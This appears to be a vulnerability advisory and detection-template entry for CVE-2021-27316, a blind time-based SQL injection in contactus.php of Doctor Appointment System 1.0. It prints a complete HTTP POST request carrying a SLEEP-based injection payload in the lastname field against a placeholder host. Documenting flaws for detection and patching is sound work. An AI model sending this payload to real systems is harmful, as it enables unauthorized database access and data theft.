| Title | Doctor Appointment System 1.0 - SQL Injection |
|---|---|
| Author | theamanrawat |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.71381 |
| CVE ID | CVE-2021-27316 |
| CWE ID | CWE-89 |
| Tags | time-based-sqli cve2021 cve sqli doctor-appointment-system packetstorm doctor_appointment_system_project vuln |
Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter.
POST /contactus.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; arm64 Mac OS X 12_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Connection: close
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
firstname=38FJAo9EQ4ZlTkZ1aXrRCESk6lg&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email=38FJAo9EQ4ZlTkZ1aXrRCESk6lg%40test.com&comment=38FJAo9EQ4ZlTkZ1aXrRCESk6lg&submit=Send+Us
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-27316.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-27316.pcap
N/AN/A